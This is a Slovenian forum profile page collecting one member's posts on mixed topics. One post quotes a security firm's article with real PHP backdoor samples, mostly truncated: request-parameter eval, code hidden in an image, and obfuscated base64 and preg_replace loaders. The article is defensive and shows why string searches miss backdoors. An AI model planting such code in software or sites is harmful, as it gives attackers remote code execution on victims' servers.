1qay1qay

Statistika

Pridružen/a:
12 avg 2010, 11:49
Zadnjič aktiven:
08 jun 2026, 15:24
Prispevki:
2968 | Vsi prispevki
Teme:
185 | Vse teme
2430
194
84

Podpis

Delko www.delko.si [Moto akumulatorji] | [Polnilne baterije] | [GP baterije]
#32

PHatch poganjaš preko skript , kjer lahko določiš to


všeč(0) ni všeč(0) spam(0)
#25

preveri htaccess datoteke, zadnje čase je zelo popularno da ti kradejo PR ( naredijo redirect za vse obiske od gogle bota)


všeč(0) ni všeč(0) spam(0)
#

Securi.net je objavil primere aktualnih PHP backdoorov, od katerih na nekatere (vsaj jaz) pri pregledu skripte nikoli ne bi bil pozoren ;(



"On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that’s likely not to find everything (and your site will just get reinfected).



For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:



if (isset($REQUEST[\'asc\'])) eval(stripslashes($REQUEST[\'asc\']));



Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.



What about this one:



wpthemeicon=createfunction(”,filegetcontents(‘/path/wp-content/themes/themename/images/void.jpg’));$wptheme_icon();



What you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean, by being hard to detect and search for?



Fun Quiz: Find the backdoor?



Since backdoors can be in any type or shape, let’s look at some examples:



The “Filesman” backdoor, big, complex and easy to find:



$authpass = “63a9f0ea7bb98050796b649e85481845″;

$color = “#df5″;

$default
action = “SQL”;

$defaultcharset = “Windows-1251″;

$protectionoffer = “ficken”;

preg
replace(“/.*/e”,”\x65\x76\x61\x6C.. hundreds more lines..



Another simple backdoor, executing any code from the “php” request:



eval (base64decode($POST["php"]));



A WordPress-based backdoor. This time, the bad content is hidden inside the database (wp-options tables)



return @eval(get_option(\’blogopt1\’));



A messy backdoor we are seeing in the latest timthumb.php attacks. On this case, all the variables are completely random per case and per file:




function aknhtkmml3($ur5){$dtuq=’$u’;$pnt=’e6′;$p5zy=’r';$xcl4=’e(‘;$feuh=’od’;$qjka=’dec’;$rhi=’$u’;

$m=’as’;$xcew=’);’;$iw=’_';$jutx=’5=b’;$fwiw=’4′;$zqi=’r';$pwrb=’5′;

eval($rhi.$p5zy.$jutx.$m.$pnt.$fwiw.$iw.$qjka.$feuh.$xcl4.$dtuq.$zqi.$pwrb…

return $ur5;}$sk25=’M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…




Another messy one. Do you know how the code is executed there? Preg_replace with the “e” modifier actually acts like an “eval”:




$lllllll=’lllllllll’;

$llllll=”/^.$/e”;

$llllllll=’ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF

$lllllllll=pack(‘H
’, ’406576616c286261736536345f6465636f646528′).’\$llllllll))’;

preg_replace($llllll, $lllllllll, $lllllll);




Searching for base64_decode? Well, what happens when the attackers do this:



<?php $XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb

=’b’.$XZKsyG.$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$j

oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY…



And those are just some simple examples…"


všeč(5) ni všeč(0) spam(0)
#1

web content studio - če želiš upoštevat LSI nima konkurence


všeč(1) ni všeč(0) spam(0)
#29

Mitja , lej kaj pravi avtor te skripte: "After a thorough investigation, he learned that an attacker had used TimThumb to load a PHP file into one of his site directories and then execute it. The utility, he said, by default allows files to be remotely loaded and resized from blogger.com, wordpress.com, and five other websites and doesn't vet URLs for malicious strings, making it possible to upload malicious payloads."



Včasih je bolj kako stvar opravit z robotom ;) , seveda pa ni dobro če original zbrišeš.


všeč(0) ni všeč(0) spam(0)
#3

Uvažamo sami a najraje od tistih ki imajo vsaj pisarno v EU , da smo kriti :)

Brezžične robe trenutno sploh ne uvažamo , ker so RTTE zahteve ostre, kitajci imajo pa certifikate zelo labave.



Recimo LED trakove letos ne uvažamo (imamo dobavitelja iz EU - cene se dajo tudi v EU znižati če pokažeš da poznaš situacijo). Uvažamo pa recimo LED VRVI, kjer pa smo kar dve sezoni šolali kitajskega dobavitelja, letos ga bomo pa ponvno ker je "naš" komercialist odšel in njegov namestnik je do sedaj prodajal svilo .(( Pri led vrveh je bil sploh problem, ker je EU izala direktivo za poostren nadzor svetlobnih vrvi ( to je novoletna roba). Kontrolirali so vse : če recimo na napajalniku ni vseh piktogramov, je izdelek umaknjen iz trga ....


všeč(2) ni všeč(0) spam(0)
#75

Jaz sem ga hotel imet, pa sem se ustrašil ko sem po spletu bral grozljivko o reševanju problemov - support center za SLO je v Grčiji (????) in šele ko on odobri ti naši lokalci zamenjajo/popravijo , tako da sem potem kupil HP ZR24w :)))


všeč(0) ni všeč(0) spam(0)
#5

RSS :

http://www.securityfocus.com/

http://www.1337day.com/

http://www.abuse.ch/



Plus nastavi si Google Alert


všeč(0) ni všeč(0) spam(0)
#73

@Freekman : eno leto je garancija tako da np ... in novi so že na morju :)


všeč(0) ni všeč(0) spam(0)
#72

@urosbe : hvala za post in oceno . Moram pa priznat, da Dell IPS lepo paše zraven :)


všeč(0) ni všeč(0) spam(0)